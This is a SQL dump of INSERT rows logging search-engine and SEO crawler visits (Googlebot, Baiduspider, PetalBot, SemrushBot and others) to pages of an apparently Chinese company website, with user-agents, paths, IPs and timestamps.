INSERT INTO `ey_weapp_spider_visit` VALUES ('97953', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/135.html', '216.244.66.194', '1661961239', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97951', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/226.html', '114.119.151.153', '1661960557', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97977', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/193_2.html', '185.191.171.1', '1661979164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97950', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/30.html', '66.249.79.110', '1661960229', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97955', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1661962250', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97939', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/232.html', '185.191.171.13', '1661956731', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97961', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/gongsijianjie/', '114.119.151.153', '1661967282', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98040', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/214.html', '114.119.151.155', '1662011654', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98276', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/344.html', '185.191.171.8', '1662119404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97980', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_43/', '114.119.151.153', '1661981088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98046', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nantongshi.html', '114.119.151.155', '1662012493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98271', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/212.html', '114.119.151.155', '1662113603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97941', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661956947', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97937', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/20.html', '66.249.79.110', '1661955434', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97974', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.108', '1661974680', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97976', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/100.html', '185.191.171.23', '1661977220', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98039', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_17', '114.119.151.155', '1662011480', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97983', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/153.html', '185.191.171.44', '1661983902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98273', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/155.html', '116.179.32.94', '1662114311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97993', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/76.html', '185.191.171.40', '1661987834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97994', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/7.html', '185.191.171.10', '1661988114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97995', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.125', '1661989819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97991', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661987319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98037', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_45/', '114.119.151.153', '1662011146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97949', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661959603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97959', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/93.html', '114.119.151.155', '1661965974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97969', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1661972234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98033', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/432.html', '114.119.151.153', '1662010467', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98034', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_63/', '114.119.151.153', '1662010637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98035', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/479.html', '114.119.151.153', '1662010800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97936', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661955041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98021', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/361.html', '116.179.32.104', '1662006309', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97934', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/28.html', '185.191.171.45', '1661952434', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97926', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4.html', '185.191.171.40', '1661947362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97919', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_7/', '114.119.151.155', '1661944989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97932', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/249.html', '114.119.151.155', '1661949438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97927', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/175.html', '185.191.171.1', '1661947655', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97928', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/', '185.191.171.12', '1661947910', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97922', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/57_4.html', '185.191.171.2', '1661945285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97920', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/223.html', '216.244.66.194', '1661945148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98049', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/435.html', '114.119.151.153', '1662013011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97923', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661945609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98293', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/99.html', '66.249.79.108', '1662131423', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97910', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/497.html', '114.119.151.153', '1661941420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97911', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen', '66.249.79.110', '1661941455', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97908', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.112', '1661940519', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97909', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/498.html', '216.244.66.194', '1661940646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97921', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/480.html', '114.119.151.153', '1661945165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97917', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lasa.html', '114.119.151.153', '1661943400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97890', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1661932231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97891', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/354.html', '220.181.108.176', '1661934106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97885', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/10.html', '116.179.32.41', '1661930440', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97883', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/362.html', '216.244.66.194', '1661930150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97879', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_40/', '185.191.171.17', '1661926980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97878', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/index.php?a=gbook_submit&c=Lists&lang=cn&m=home', '185.191.171.23', '1661926723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97876', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.112', '1661926087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98045', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/124.html', '185.191.171.20', '1662012406', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97952', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/20.html', '66.249.79.110', '1661960894', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97868', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/429.html', '185.191.171.26', '1661919485', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97954', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/70.html?tagid=70', '185.191.171.26', '1661961671', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97862', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/228.html', '116.179.32.148', '1661916389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98032', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chezaibengal/', '114.119.151.153', '1662010296', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97992', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor', '114.119.151.153', '1661987677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97896', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/460.html', '216.244.66.194', '1661936346', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98028', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xt.html', '114.119.151.153', '1662009332', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97889', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661931871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97838', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/228.html', '216.244.66.194', '1661908940', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98020', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_47/', '66.249.79.110', '1662005531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98009', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.191', '1661998842', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98010', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/147.html', '216.244.66.194', '1661999048', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98029', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/173.html', '114.119.151.155', '1662009799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97834', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bengche/', '185.191.171.9', '1661906339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97874', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.112', '1661922798', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97836', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/207.html', '185.191.171.6', '1661907671', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98025', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662007636', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97826', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.75', '1661902030', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97822', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/333.html', '185.191.171.37', '1661900738', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97813', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.108', '1661896884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97811', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/124.html', '66.249.79.110', '1661896732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97812', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/76.html', '116.179.32.115', '1661896741', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97820', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/144.html', '185.191.171.44', '1661899299', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97823', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661901174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97761', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/355.html', '185.191.171.5', '1661887095', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97795', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/80.html', '66.249.79.108', '1661894026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97749', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.112', '1661885980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97740', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/152.html', '66.249.79.112', '1661876862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97739', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661876583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97748', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/306.html', '66.249.79.108', '1661885665', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98267', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/laibing.html', '114.119.151.155', '1662112644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97741', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/63.html', '116.179.32.155', '1661877106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97746', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/351.html', '220.181.108.169', '1661882014', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97742', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/18.html', '185.191.171.41', '1661877729', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97734', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/62.html', '116.179.32.241', '1661872196', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97736', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.91', '1661872851', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97733', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/131.html', '114.119.151.153', '1661872075', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97752', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.110', '1661886297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97745', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4.html?tagid=4', '116.179.32.24', '1661879559', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98022', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_2.html', '185.191.171.13', '1662006679', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97731', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/301.html', '116.179.32.17', '1661869744', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97755', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.108', '1661886708', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98023', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_6.html', '185.191.171.38', '1662007075', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97757', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.108', '1661886834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97828', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/47.html', '220.181.108.166', '1661904108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97728', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/njs.html', '114.119.151.153', '1661868790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97905', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.110', '1661940096', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97827', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.75', '1661902565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97732', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/153.html', '185.191.171.15', '1661870658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97735', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/82.html', '185.191.171.33', '1661872662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97743', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/23.html', '185.191.171.9', '1661877890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98043', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/chengdushi.html', '114.119.151.153', '1662012157', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97730', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/71.html', '185.191.171.45', '1661869351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97727', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yts.html', '114.119.151.153', '1661868528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97849', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lf.html', '114.119.151.153', '1661911266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97904', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/212.html', '220.181.108.155', '1661939359', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97744', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_8.html', '185.191.171.8', '1661879539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97906', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/108.html', '185.191.171.9', '1661940416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97765', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/496.html', '66.249.79.108', '1661887499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97763', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661887281', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97764', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.110', '1661887404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97737', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/229.html', '116.179.32.167', '1661874652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97916', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/235.html', '185.191.171.5', '1661942957', '0');
